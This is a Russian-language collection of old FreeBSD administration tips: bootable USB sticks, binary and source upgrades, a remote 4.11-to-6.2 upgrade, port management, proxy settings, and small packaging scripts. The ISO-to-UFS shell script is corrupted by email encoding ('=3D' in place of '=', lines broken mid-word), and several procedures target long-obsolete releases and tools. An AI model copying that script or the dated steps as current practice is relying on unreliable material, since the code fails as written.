1. Разметить флэшку На всё пространство: fdisk -BI /dev/da0 Интерактивно разбить на разделы: fdisk -i /dev/da0 (ID разделов: UFS - 165, FAT32 - 11, EFI GPT - 238) Используя конфиг-файл: fdisk -f /poat/to/fdiskcofig.txt /dev/da0 2. Форматирование MSDOS: newfs_msdos -L DOS7 /dev/da0s1 FreeBSD: bsdlabel -w -B da0s2 && newfs -n -U -L FBSD /dev/da0s2a 3. Установка загрузчика в MBR флэшки boot0cfg -v -B -o noupdate da0 4. Копирование системных каталогов на флэшку mount /dev/da0s2a /mnt cp -R /boot /mnt/ cp -R /sbin /mnt/ cp -R /libexec /mnt/ cp -R /lib /mnt/ cp -R /bin /mnt/ cp -R /etc /mnt/ mkdir -p /mnt/usr/ cp -R /usr/bin /mnt/usr/ cp -R /usr/compat /mnt/usr/ cp -R /usr/games /mnt/usr/ cp -R /usr/include /mnt/usr/ cp -R /usr/lib /mnt/usr/ cp -R /usr/libdata /mnt/usr/ cp -R /usr/libexec /mnt/usr/ cp -R /usr/local /mnt/usr/ cp -R /usr/ports /mnt/usr/ cp -R /usr/sbin /mnt/usr/ cp -R /usr/share /mnt/usr/ cp -R /usr/src /mnt/usr/ cp -R /var /mnt/ rm -rf /mnt/var/tmp/* && chmod -R 777 /mnt/var/tmp/ rm -rf /mnt/var/run/* rm -rf /mnt/var/log/* mkdir -p /mnt/mnt/ mkdir -p /mnt/media/ mkdir -p /mnt/cdrom/ mkdir -p /mnt/dev/ mkdir -p /mnt/proc/ mkdir -p /mnt/tmp/ && chmod -R 777 /mnt/tmp/ mkdir -p /mnt/usr/obj/ 5. Перенос домашних каталогов cp -R /root /mnt/ cp -R /home /mnt/ 6. Обеспечение загрузки с флэшки echo 'geom_label_load="YES"' >> /mnt/boot/loader.conf echo 'ifconfig_DEFAULT="DHCP"' >> /mnt/etc/rc.conf echo 'virecover_enable="NO"' >> /mnt/etc/rc.conf ee /mnt/etc/fstab: # Device Mountpoint FStype Options Dump Pass# #/dev/ad4s1f /usr ufs rw,noatime 2 2 #/dev/ad4s1g /home ufs rw,noatime 2 2 /dev/ufs/FBSD / ufs rw,noatime 1 1 md /tmp mfs rw,-s160M,noatime 0 0 md /var/run mfs rw,-s14M,noatime 0 0 md /var/log mfs rw,-s26M,noatime 0 0 #md /usr/obj mfs rw,-s900M,noatime 0 0 /dev/acd0 /cdrom cd9660 ro,noauto,-CUTF-8 0 0 /dev/da0s1 /mnt msdosfs rw,noauto,-D=CP1251,-L=ru_RU.UTF-8 0 0 /proc /proc procfs rw,noauto 0 0 /tmp /var/tmp nullfs rw 0 0 7. Перезагрузка umount /dev/da0s2a reboot 8. Важное замечание Команды копирования системных каталогов необходимо выполнять, начиная с копирования каталога /boot и /sbin, в которых находятся файлы ядра и процессов инициализации системы. Это необходимо для того, чтобы загрузчик boot1/boot2 сумел найти код инициализации ядра в первых цилиндрах раздела носителя.

Наиболее простой способ обновления FreeBSD до последней версии [комментарии]

Для i386 и amd64 сборок FreeBSD для бинарного обновления можно использовать утилиту freebsd-update. Обновляем FreeBSD 6.3 до 6.4-RELEASE Проверяем файл конфигурации /etc/freebsd-update.conf, можно изменить сервер для загрузки обновлений и обновляемые компоненты, например, исключить src. Загружаем обновления, которые будут сохранены в /var/db/freebsd-update (в /var необходимо наличие как минимум 400Мб свободного места): freebsd-update upgrade -r 6.4-RELEASE Устанавливаем обновления, попутно отвечая на вопросы, касающиеся решения конфликтов при обновлении файлов конфигурации: freebsd-update install Перезагружаем систему: shutdown -r now Деинсталировать установленные обновления можно при помощи команды "rollback". Утилита freebsd-update входит в состав FreeBSD, начиная с версии 6.2. Инструкция по обновлению FreeBSD 6.x до FreeBSD 7.0 Загружаем скрипт обновления, проверяем его целостность и разархивируем: fetch http://people.freebsd.org/~cperciva/freebsd-update-upgrade.tgz fetch http://people.freebsd.org/~cperciva/freebsd-update-upgrade.tgz.asc gpg --verify freebsd-update-upgrade.tgz.asc freebsd-update-upgrade.tgz tar -xf freebsd-update-upgrade.tgz Загружаем файлы обновлений и производим первичную подготовку: sh freebsd-update.sh -f freebsd-update.conf -r 7.0-RELEASE upgrade Устанавливаем обновления (устанавливаем новое ядро): sh freebsd-update.sh -f freebsd-update.conf install Перезагружаем систему: shutdown -r now Второй раз запускаем установку обновлений (при первом запуске было обновлено только ядро, при повторном запуске выполняется обновление базового окружения): sh freebsd-update.sh -f freebsd-update.conf install Пересобираем установленные дополнительные приложения (порты), так как они могут ссылаться на старые библиотеки. portupgrade -faP Третий раз запускаем процесс обновления, теперь для удаления старых библиотек: sh freebsd-update.sh -f freebsd-update.conf install Выполняем перезагрузку: shutdown -r now

Организация установки FreeBSD с USB Flash (доп. ссылка 1) (доп. ссылка 2) (доп. ссылка 3) [комментарии]

Иногда возникает необходимость создать установочный Flash-диск с FreeBSD, но без переформатирования FAT-раздела на Flash, при сохранении размещенных там данных. Загружаем с ftp.freebsd.org минимальный установочный образ 6.3-RELEASE-i386-bootonly.iso ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/ISO-IMAGES/6.3/6.3-RELEASE-i386-bootonly.iso Создаем на его основе ram-диск. Операции выполняются на FreeBSD системе, при необходимости временно FreeBSD можно поставить в KVM, VmWare или VirtualBox. Создаем образ RAM-диска размером чуть больше bootonly.iso: dd if=/dev/zero of=boot.img bs=1k count=26000 Подключаем ram-диск: mdconfig -a -t vnode -f boot.img -u 0 Устанавливаем загрузочный сектор и размечаем по умолчанию: bsdlabel -w -B md0 auto Создаем файловую систему: newfs -m 0 md0a Монтируем созданную ФС ram-диска: mkdir /mnt/img mount /dev/md0a /mnt/img Монтируем iso-образ и переносим с него данные на ram-диск: mkdir /mnt/iso mdconfig -a -t vnode -f 6.3-RELEASE-i386-bootonly.iso -u 1 mount_cd9660 /dev/md1 /mnt/iso cd /mnt/img/ cp -r /mnt/iso/* . Размонтируем: cd umount /mnt/img /mnt/iso mdconfig -d -u 0 mdconfig -d -u 1 Загружаем Linux, можно LiveCD. Копируем boot.img на Flash диск. Копируем на Flash файл memdisk из комплекта syslinux (http://syslinux.zytor.com). Ставим syslinux на Flash (/dev/sdb1): syslinux -s /dev/sdb1 Создаем в корне файл syslinux.cfg: label freebsd kernel /memdisk append initrd=/boot.img harddisk Если не грузится, ругаясь на MBR, заменяем MBR на содержимое файла mbr.bin из комплекта syslinux: dd if=/dev/sdb of=mbr_backup.bin bs=1 count=512 cat mbr.bin > /dev/sdb Проверить можно через QEMU: qemu -hda /dev/sdb1 -std-vga При установке выбираем метод получения установочных файлов по FTP или копируем их на Flash (директорию 6.3-RELEASE из 6.3-RELEASE-i386-disc1.iso). -------------------- В случае когда USB Flash не жалко отформатировать, можно можно создать загрузочный USB Flash следующим образом: fdisk -BI /dev/da2 bsdlabel -w -B /dev/da2s1 newfs /dev/da2s1a mount /dev/da2s1a /mnt Копируем в /mnt содержимое содержимое 6.3-RELEASE-i386-bootonly.iso -------------------- Установка загрузчика FreeBSD на Flash из Linux: Делаем бэкап текущего MBR USB диска: dd if=/dev/sdb of=mbr_sdb.bin bs=1 count=512 Берем boot0 из комплекта FreeBSD и копируем в него данные о таблицах разделов текущего диска: dd if=mbr_sdb.bin of=boot0 bs=1 count=66 skip=446 seek=446 Копируем загрузчик в MBR USB диска: dd if=boot0 of=/dev/sdb bs=1 count=512 Инструкцию по созданию установочного образа FreeBSD, загружаемого по сети можно найти здесь http://wiki.opennet.ru/NetworkBoot --------------------- Полезный скрипт для преобразования ISO в UFS-образ (http://docs.FreeBSD.org/cgi/mid.cgi?4420AF56.60106) Запускается ./fbsd-install-iso2img.sh iso-path img-path #!/bin/sh # You can set some variables here. Edit them to fit your needs. # Set serial variable to 0 if you don't want serial console at all, # 1 if you want comconsole and 2 if you want comconsole and vidconsole serial=3D0 set -u if [ $# -lt 2 ]; then echo "Usage: $0 source-iso-path output-img-path" exit 1 fi isoimage=3D$1; shift imgoutfile=3D$1; shift export tmpdir=3D$(mktemp -d -t fbsdmount) # Temp file and directory to be used later export tmpfile=3D$(mktemp -t bsdmount) export isodev=3D$(mdconfig -a -t vnode -f ${isoimage}) echo "#### Building bootable UFS image ####" ISOSIZE=3D$(du -k ${isoimage} | awk '{print $1}') SECTS=3D$((($ISOSIZE + ($ISOSIZE/5))*2)) # Root partition size echo "Initializing image..." dd if=3D/dev/zero of=3D${imgoutfile} count=3D${SECTS} ls -l ${imgoutfile} export imgdev=3D$(mdconfig -a -t vnode -f ${imgoutfile}) bsdlabel -w -B ${imgdev} newfs -O1 /dev/${imgdev}a mkdir -p ${tmpdir}/iso ${tmpdir}/img mount -t cd9660 /dev/${isodev} ${tmpdir}/iso mount /dev/${imgdev}a ${tmpdir}/img echo "Copying files to the image..." ( cd ${tmpdir}/iso && find . -print -depth | cpio -dump ${tmpdir}/img ) #bzcat ${tmpdir}/iso/dist/root.dist.bz2 | mtree -PUr -p ${tmpdir}/img 2>&= 1 > /dev/null #echo "/dev/ufs/${UFS_LABEL} / ufs ro 1 1" > ${tmpdir}/img/etc/fstab if [ ${serial} -eq 2 ]; then echo "-D" > ${tmpdir}/img/boot.config echo 'console=3D"comconsole, vidconsole"' >> ${tmpdir}/img/boot/l= oader.conf elif [ ${serial} -eq 1 ]; then echo "-h" > ${tmpdir}/img/boot.config echo 'console=3D"comconsole"' >> ${tmpdir}/img/boot/loader.conf fi cleanup() { umount ${tmpdir}/iso mdconfig -d -u ${isodev} umount ${tmpdir}/img mdconfig -d -u ${imgdev} rm -rf ${tmpdir} ${tmpfile} } cleanup ls -lh ${imgoutfile}

Создание установочного DVD из 4 образов CD дисков FreeBSD 7.0 (доп. ссылка 1) [комментарии]

Имеем загруженные iso образы: 7.0-RELEASE-i386-disc1.iso 7.0-RELEASE-i386-disc2.iso 7.0-RELEASE-i386-disc3.iso 7.0-RELEASE-i386-docs.iso Создаем в домашнем каталоге директорию dvd-freebsd7 и копируем туда содержимое iso образов. cd ~ mkdir dvd-freebsd7 cd dvd-freebsd7/ mdconfig -a -t vnode -f ../7.0-RELEASE-i386-disc1.iso -u 0 mount -t cd9660 /dev/md0 /mnt tar -C /mnt -cf - . | tar -xf - umount /mnt mdconfig -a -t vnode -f ../7.0-RELEASE-i386-disc2.iso -u 1 mount -t cd9660 /dev/md1 /mnt tar -C /mnt -cf - . | tar -xf - umount /mnt mdconfig -a -t vnode -f ../7.0-RELEASE-i386-disc3.iso -u 2 mount -t cd9660 /dev/md2 /mnt tar -C /mnt -cf - . | tar -xf - umount /mnt mdconfig -a -t vnode -f ../7.0-RELEASE-i386-docs.iso -u 3 mount -t cd9660 /dev/md3 /mnt tar -C /mnt -cf - . | tar -xf - umount /mnt Используя sed или обычный текстовый редактор удаляем упоминание привязки к номеру диска ("||1", "||2" и "||3") в файле packages/INDEX В файл cdrom.inf добавляем: CD_VOLUME = 0 CD_VOLUME = 1 CD_VOLUME = 2 CD_VOLUME = 3 Удаляем директорию rr_moved (иначе при создании iso образа в формате Rock Ridge будет выдана ошибка): rm -Rf rr_moved Для записи DVD на лету: growisofs -Z /dev/cd0 -J -R -no-emul-boot -b boot/cdboot -iso-level 3 . Для создания ISO образа DVD диска: mkisofs -V FreeBSD7 -J -R -b boot/cdboot -no-emul-boot -o freebsd7.iso . Для записи созданного iso: growisofs -dvd-compat -Z /dev/cd0=freebsd7.iso

Обновление FreeBSD 6.3 до FreeBSD 7.0 из исходных текстов (доп. ссылка 1) [комментарии]

Устанавливаем комплект файлов для обратной совместимости. 1. Загружаем localedata-5.4.tbz и compat6x-i386-6.x.xxxxxx.yyyymm.tbz с ftp://ftp6.ru.freebsd.org/pub/FreeBSD/ports/i386/packages-7.0-release/All 2. Первый файл распаковываем (через pkg_add имя_пакета) в /usr/local/share/compat/, второй в /usr/local/lib/compat/ Устанавливаем комплект для обновления. Загружаем http://people.freebsd.org/~rse/dist/freebsd-adm-1.2.2.tar.gz 1. Распаковываем в /usr/adm: cd /usr fetch http://people.freebsd.org/~rse/dist/freebsd-adm-1.2.2.tar.gz rm -rf adm; gunzip <freebsd-adm-1.2.2.tar.gz | tar xvf -; rm -f freebsd-adm-1.2.2.tar.gz 2. В файле /usr/adm/cfg/csup.src заменяем RELENG_6 на RELENG_7_0 Обновляем исходные тексты на FreeBSD 7.0: cd /usr/src && make cleandir cd /usr/adm && make update Обновляем конфигурацию ядра: vi /sys/`uname -m`/conf/`hostname -s | tr 'a-z' 'A-Z'` 1. Добавляем: options COMPAT_FREEBSD6 options TCP_DROP_SYNFIN options SCTP # Stream Transmission Control Protocol options UFS_GJOURNAL # Enable gjournal-based UFS options STOP_NMI # Stop CPUS using NMI instead of IPI options AUDIT # Security event auditing options GEOM_LABEL # Provides labelization options GEOM_PART_GPT # GUID Partition Tables. options COMPAT_43TTY # BSD 4.3 TTY compat [KEEP THIS!] options KSE device uart # Generic UART driver device le # AMD Am7900 LANCE and Am79C9xx PCnet device firmware # firmware assist module device dcons # Dumb console driver device dcons_crom # Configuration ROM for dcons 2. Убираем: options GEOM_GPT # GUID Partition Tables. options COMPAT_43 # Compatible with BSD 4.3 [KEEP THIS!] device lnc # NE2100, NE32-VL Lance Ethernet cards 3. Замечание по опциям: IPSEC_ESP меняем на FAST_IPSEC вместо PIM используем MROUTING вместо SCHED_4BSD можно поставить SCHED_ULE в GENERIC ядре теперь по умолчанию включены: cpufreq, dumb, uart, fwip (IP over FireWire), wlan_wep, wlan_ccmp и wlan_tkip Читаем /usr/src/UPDATING Готовимся к обновлению: mergemaster -p Собираем "мир" и ядро: cd /usr/adm && make world-build kernel-build Устанавливаем FreeBSD 7.0 make kernel-install world-install Чистим хвосты FreeBSD 6.3: rm -f /etc/rc.d/ike /etc/rc.d/pccard /etc/rc.d/pcvt /etc/rc.d/ramdisk rm -f /etc/rc.d/ramdisk-own /etc/rc.d/usbd make etc make clean Перезагружаем машину shutdown -r now Продолжаем чистку хвостов: cd /; exec `/usr/bin/which bash sh | head -1` PATH=/bin:/usr/bin:/sbin:/usr/sbin; umask 022; unset TMOUT Ищем что можно удалить: ( for dir in /bin /sbin /usr/bin /usr/sbin /usr/libexec /usr/libdata; do \ find $dir -mtime +2 -type f -xdev -print; \ find $dir -mtime +2 -type l -xdev -print; \ done ) >/tmp/remove Смотрим что будем удалять, внимательно анализируем /tmp/remove Удаляем: cat /tmp/remove | xargs rm -f Ищем что нужно переместить: ( for dir in /lib /usr/lib; do \ find $dir -mtime +2 -type f -xdev -print; \ find $dir -mtime +2 -type l -xdev -print; \ done ) | grep -v /usr/lib/compat >/tmp/move Смотрим что будем перемещать, внимательно анализируем /tmp/move for x in `cat /tmp/move`; do chflags noschg $x; mv $x /usr/lib/compat/; done Подчищаем системы после сборки: cd /usr/src; make BATCH_DELETE_OLD_FILES=YES delete-old delete-old-libs Окончатально перезагружаемся в FreeBSD 7.0 shutdown -r now Пересобираем установленные дополнительные приложения, так как они могут ссылаться на старые библиотеки. portupgrade -faP

Компилирование модулей ядра FreeBSD (доп. ссылка 1) Автор: mr.tacitus [обсудить]

Практически любой системный администратор, который сталкивался с FreeBSD, компилировал ядро под себя, выбрасывая оттуда лишние "детали" или вставляя недостающие. Между тем выброшенная из ядра "деталька" никуда не девается и при повторной компиляции превращается в модуль (за редким исключением), который всегда можно подгрузить. Бороться с этим можно с помощью опций в файле make.conf: # не компилировать все модули NO_MODULES="YES" # компилировать только указанные модули # названия модулей пишутся через пробел MODULES_OVERRIDE=acpi ipfw # компилировать все модули, за исключением указанных WITHOUT_MODULES=pf ntfs_iconv

Обновление портов во FreeBSD (доп. ссылка 1) Автор: Roman Sozinov [комментарии]

Прежде чем что-либо делать с портами в FreeBSD их необходимо обновить: # cat >> /etc/make.conf SUP_UPDATE=yes SUP=/usr/local/bin/cvsup SUPFLAGS=-g -L 2 SUPHOST=cvsup.uk.FreeBSD.org SUPFILE=/usr/share/examples/cvsup/standard-supfile PORTSSUPFILE=/usr/share/examples/cvsup/ports-supfile DOCSUPFILE=/usr/share/examples/cvsup/doc-supfile Ctrl + D # cd /usr/ports # make update Найти в портах (/usr/ports) порт portupgrade (/usr/ports/ports-mgmt/portupgrade), установить его cd /usr/ports/ports-mgmt/portupgrade make && make install После этого можно с помощью утилиты portupgrade уже возможно обновлять установленные порты (ключ -R говорит о том, что нужно обновить не только порт, но и все его зависимости) portupgrade -R имя_порта Чтобы узнать список портов, нуждающихся в обновлении, существует команда pkg_version -v Для наведения порядка (удаление неиспользуемых портов, дубликатов версий) в реестре установленных портов (/var/db/pkg) можно воспользоваться командой pkgdb -F Ссылки: 1. "Системный администратор" (2007.01) 2. Очистка портов во FreeBSD https://www.opennet.ru/base/sys/cleaning_up_ports.txt.html 3. portupgrade - `обновлялка` установленных портов http://www.lissyara.su/?id=1153 Дополнение: C 2012 года проект FreeBSD перешёл на использование Subversion. Вместо cvsup следует использовать svnup (или freebsd-update для системы, portsnap/pkg для портов): cd /usr/ports/net/svnup && make install svnup stable -h svn0.us-west.freebsd.org svnup ports -h svn0.us-west.freebsd.org Настройки можно найти в файле /usr/local/etc/svnup.conf

Удаленное бинарное обновление FreeBSD 4.11 до 6.2-RELEASE (доп. ссылка 1) Автор: Eugene Grosbein [комментарии]

Удаленное бинарное обновление 4.11 до 6.2-RELEASE, без доступа с консоли с двумя перезагрузками и минимальным downtime, безопасное настолько, насколько это возможно при обновлении "по месту". Требуется доступность первого инсталляционного CD из дистрибутива 6.2-RELEASE, либо нужно будет скачать с десяток мегабайт из него для пункта 3 ниже. 1. Подготовить новое содержимое для /boot Скопировать с дистрибутивного CD 6.2-RELEASE каталог boot в /boot6, loader.conf оставить старый (если дистрибутив машине недоступен, сначала скачать /boot с него по сети в каталог /cdrom/boot): cd / CDROM=/cdrom cp -r $CDROM/boot boot6 cd boot6 mv loader.conf loader.conf6 cp ../boot/loader.conf . || true mv kernel kernel6 mkdir kernel ln ../kernel kernel 2. Меняем местами старый и новый loader: cd .. mv boot boot4 mv boot6 boot Теперь у нас новый loader, который грузит старое ядро из файла /boot/kernel/kernel (это хардлинк на /kernel), и старые модули из /modules. Система пока работает по-старому, при перезагрузке ничего не поломается. 3. Подготовка mfsroot. Если дистрибутива на четверке нет, этот пункт можно полностью выполнять на другой машине, и готовый mfsroot.gz (5.5Mb) потом скачать в /boot/mfsroot.gz. Если выполняется на свежей FreeBSD, заменить vnconfig на mdconfig и disklabel на bsdlabel (убрать слово auto): TMPDIR=/var/tmp # можно и другое место cd $TMPDIR # быстрый и простой способ требует mfsroot на 14Mb # создаём файл образа на основе такого же # из дистрибутива dd if=/dev/zero of=mfsroot bs=1m count=14 dev=vn0c vnconfig -c -s labels $dev mfsroot disklabel -w -B -b $CDROM/boot/boot $dev auto newfs -m 0 -o space -b 4096 -f 512 $dev # Монтируем оригинальный и новый mfsroot mkdir /mnt/omfs /mnt/mfs gzcat $CDROM/boot/mfsroot.gz > mfsroot.orig odev=vn1c vnconfig -c -s labels $odev mfsroot.orig mount -o ro /dev/$odev /mnt/omfs mount /dev/$dev /mnt/mfs # Для начала копируем оригинальный в новый cd /mnt/omfs tar -cf - * | tar -C /mnt/mfs -xf - # Оригинальный mfsroot больше не нужен cd /mnt/mfs umount /mnt/omfs vnconfig -d $odev rm $TMPDIR/mfsroot.orig # Затачиваем новый mfsroot под неинтерактивную загрузку rm -r etc bin sbin var stand/etc stand/help ln -s stand bin ln -s stand sbin mkdir -p tmp # В тестовой системе /usr и /var - отдельные от рута fs, # при промежуточной загрузке будут смонтированы так: # /mnt - рут # /mnt/usr - /usr # /mnt/var - /var # Таким образом, chroot /mnt при желании # после загрузки даст нам оригинальный расклад # и позволит воспользоваться новым sysinstall-ом ln -s mnt/usr usr ln -s mnt/var var # Hовые бинарники используются новым ядром # при загрузке с md0 cd $CDROM # игнорировать ошибки касательно "File exists" tar cf - bin etc lib libexec sbin | tar -C /mnt/mfs -xkf - # Минимально необходимый набор файлов со старой системы для успешного удаленного # входа в систему; nsswitch.conf берем с новой системы cd /etc cp -rp fstab host.conf rc.conf ssh passwd group master.passwd pwd.db spwd.db /mnt/mfs/etc cat <<EON > /mnt/mfs/etc/nsswitch.conf group: files hosts: files dns networks: files passwd: files shells: files EON Теперь нужно привести /mnt/mfs/etc/fstab к примерно следующему виду: # Device Mountpoint FStype Options Dump Pass# /dev/md0 / ufs rw 1 1 /dev/ad0s1b none swap sw 0 0 /dev/ad0s1a /mnt ufs rw 2 2 /dev/ad0s1f /mnt/usr ufs rw 2 2 /dev/ad0s1e /mnt/var ufs rw 2 2 Первая строка обязательно такая, остальные - из оригинального fstab, точку монтирования для рута заменяем на /mnt, /usr и /var тоже смещаем внутрь /mnt, остальные файловые системы (если есть) намеренно не упоминаем. В /mnt/mfs/etc/fstab желательно отключить все сервисы, кроме sshd и каналообразующих (учитывать, что грузиться будет GENERIC), что-то типа этого: ifconfig_rl0="inet x.x.x.x netmask 255.255.255.0" hostname="host.domain.ru" sendmail_enable="NONE" firewall_enable="NO" inetd_enable="NO" sshd_enable="YES" fsck_y_enable="YES" background_fsck="NO" # EOF Закрываем и запаковываем mfsroot: cd $TMPDIR umount /mnt/mfs vnconfig -d $dev gzip -1 < mfsroot > /boot/mfsroot.gz 4. Подгрузка полученного mfsroot: cd /boot cat loader.conf6 >> loader.conf Это добавляет в loader.conf следующие команды: mfsroot_load="YES" mfsroot_type="mfs_root" mfsroot_name="/boot/mfsroot" Hа работу четвертой версии не влияет никак, пока по-прежнему используется старая корневая файловая система, только увеличивается размер оперативной памяти, зарезервированной ядром. Hа машине с 48M памяти изменение составило те самые 14M, avail memory вместо 44316K стала 30140K. 5. Решающий момент. Для загрузки нового ядра с новым рутом посредством nextboot: cat <<EOF > nextboot.conf nextboot_enable="YES" kernel="kernel6" vfs.root.mountfrom="ufs:md0" EOF Если новое ядро, скажем, зависнет на этапе определения оборудования до перехода в multiuser, достаточно дернуть питание и машина загрузит старое ядро и четвертую версию и у вас есть возможность спокойно разобраться, система тем временем работает. При следующей попытке этот пункт нужно повторить, nextboot.conf будет удалён при перезагрузке. При использовании cut-n-paste команд из этого пункта проверьте, что в конце строк nextboot.conf нет лишних пробелов - загрузчик этого не любит и может проигнорировать конфигурацию nextboot. Перезагружаемся! 6. При успешной загрузке запускается старый /usr/sbin/sshd, через него заходим в систему. Авторизация через keyboard-interactive не срабатывает, зато срабатывает через password, то есть в систему пустит после четвертой попытки набора пароля. Эту косметическую проблему править не стал, всё равно на это один только раз наталкиваемся. Переименовываем /mnt/stand в /mnt/stand4, создаём новый /mnt/stand, копируем /stand/sysinstall в /mnt/stand/sysinstall, делаем chroot /mnt. 7. Это - точка, после которой нет возврата, кроме восстановления из бекапа с консоли. Сейчас пока можно ещё перегрузиться обратно в четверку и работать по-старому. Дальше уже нет. # если не сделать этой правки loader.conf, система не поднимется echo 'kernel="GENERIC"' >> /boot/loader.conf /stand/sysinstall Выбираем Upgrade. Я делал бинарное обновление по FTP, из дистрибьюшнов ставил только base и kernels (меню Custom). Во время обновления в терминал выдавалось куча мусора от распаковщика, но это косметическое неудобство. Апгрейд прошел совершенно гладко, система перезагрузилась уже в шестерку с винта и доступна (теперь уже через свежий) sshd. Убираем строки mfsroot_* из /boot/loader.conf Hе забываем разгрести /etc/upgrade или сделать обновление из исходников, mergemaster позаботится о /etc. В любом случае перезагружаемся опять, теперь уже это будет не из mfsroot.

Скрипт деинсталляции пакетов во FreeBSD вместе с зависимостями. Автор: Artem A. Kolpakov [комментарии]

#!/usr/bin/perl # # Interactive script for deinstalling 'leaf' FreeBSD packages. # # Copyright (c) 2007 Artem A. Kolpakov <artem.kolpakov at gmail.com> # # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY # OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF # SUCH DAMAGE. $dbdir="/var/db/pkg"; die "Usage: pkg_deinstall.pl \'package_name\' or \'$dbdir/package_name\'.\n" if(!defined($ARGV[0])); $pkg=$ARGV[0]; if(map /$dbdir/, $pkg) { $pkg=~/$dbdir\/(\S+[^\/])/; $pkg=$1; } die "$pkg is not installed!\n" if((!map /\S+\d/, $pkg)||(!-e "$dbdir/$pkg")); if(-w $dbdir) { $rw=1; } else { $rw=0; } if(-s "$dbdir/$pkg/+REQUIRED_BY") { open(REQ, "$dbdir/$pkg/+REQUIRED_BY"); while(<REQ>) { print "Found required dependence: $_"; $req_sum++; } close(REQ); } die "Required dependencies: $req_sum. Remove is impossible.\n" if($req_sum); open(DEP, "$dbdir/$pkg/+CONTENTS"); while(<DEP>) { if(/\@pkgdep\s(\S+)\n/) { $pkg_depends{$1}=1; print "Dependence: $1\n"; } } close(DEP); die "You have not privilegies to complete operation.\n" if(!$rw); $dep_sum=(keys %pkg_depends); if($dep_sum) { print "Total dependencies: $dep_sum. Removing package.\n"; } else { system "pkg_delete $pkg"; die "The package has been removed.\n"; } system "pkg_delete $pkg"; print "Done, processing...\n"; while(scalar(keys %pkg_depends)) { $level++; if($level > 1) { for $pkg_depends (keys %pkg_depends) { if($pkg_depends{$pkg_depends} == $level-1) { if(-e "$dbdir/$pkg_depends/+CONTENTS") { open(DEP, "$dbdir/$pkg_depends/+CONTENTS"); while(<DEP>) { if(/\@pkgdep\s(\S+)\n/) { $pkg_depends{$1}=$level; } } close(DEP); open(COMMENT, "$dbdir/$pkg_depends/+COMMENT"); chomp($comment=<COMMENT>); close(COMMENT); dialog: print "Are you sure want to remove \'$pkg_depends\'? \- \'$comment\' [Y/n]: "; chomp($in=<STDIN>); if(($in eq "y")||($in eq "Y")||($in eq '')) { system "pkg_delete $pkg_depends"; delete $pkg_depends{$pkg_depends}; $rm_dep_sum++; } elsif(($in eq "n")||($in eq "N")) { delete $pkg_depends{$pkg_depends}; } else { goto dialog; } } else { delete $pkg_depends{$pkg_depends}; } } } } for $pkg_depends (keys %pkg_depends) { if($pkg_depends{$pkg_depends} == $level) { if(-s "$dbdir/$pkg_depends/+REQUIRED_BY") { delete $pkg_depends{$pkg_depends}; } } } } if($rm_dep_sum) { print "Removed $rm_dep_sum dependencies.\n"; } else { print "No dependencies removed.\n"; }

Настройка выхода через прокси утилиты fetch во FreeBSD Автор: Roman Y. Bogdanov [комментарии]

В /etc/make.conf добавляем: FETCH_ENV=FTP_PROXY=ftp://имя:пароль@IP_прокси:порт_прокси FETCH_ENV=HTTP_PROXY=http://имя:пароль@IP_прокси:порт_прокси Дополнительно, вместо fetch можно прописать и другую утилиту для загрузки или поменять параметры запуска. В /etc/make.conf: FETCH_CMD=/usr/bin/fetch -ARrvp -T 10 Или просто перед запуском fetch устанавливаем переменные окружения shell: setenv HTTP_PROXY http://user:pass@10.20.30.40:3128 setenv FTP_PROXY http://40.30.20.10:8080

Работа cvsup и csup через proxy Автор: st_serg [комментарии]

Использования nc (netcat) в качестве прокси для cvsup и csup. rc.conf: inetd_enable="YES" inetd.conf: cvsup stream tcp nowait root /usr/bin/nc nc -xA.B.C.D:8080 -Xconnect cvsup2.ru.freebsd.org 5999 supfile: *default host=127.0.0.1

Запуск стартовых скриптов из портов FreeBSD без изменения /etc/rc.conf Автор: Svinka [комментарии]

Для запуска/остановки сервиса с помощью стартового скрипта вручную без внесения записи в /etc/rc.conf найдено такое решение (FreeBSD 6.*, csh): env samba_enable=YES /usr/local/etc/rc.d/samba start env samba_enable=YES /usr/local/etc/rc.d/samba stop

Автоматизация создания скомпилированных пэкаджей во FreeBSD Автор: Eugene Pankratov [комментарии]

#!/bin/sh # # pkgmake # Create package by name or full installed tree # Version: 1.0b # Copyright (c) 2007 Eugene Pankratov pkg_path="/usr/ports/packages/All" pkg_cmd="pkg_create -yb" usage() { echo "" echo "Usage: `basename $0` <pkg_name>|--all" echo "" echo "Example: `basename $0` kdebase_3.5.5_3" echo " `basename $0` --all" exit 1 } do_package() { pkg_name=$1 pkg_file=${pkg_name}.tbz if [ ! -f ${pkg_path}/${pkg_file} ]; then echo -n "Creating package '${pkg_name}'... " ${pkg_cmd} ${pkg_name} echo "Done." else echo "Package ${pkg_file} already exists. Skiping" fi } do_all() { echo "Creating all installed packages" for i in `pkg_info | awk '{ print $1 }'` do do_package ${i} done } main() { if [ "$1" = "" ]; then usage else cd ${pkg_path} if [ "$1" = "--all" ]; then do_all else do_package $1 fi fi } main $1 exit 0

Скрипт для создания всех пакетов, требуемых по зависимостям, для порта в ОС FreeBSD Автор: Alexey Tsvetnov [комментарии]

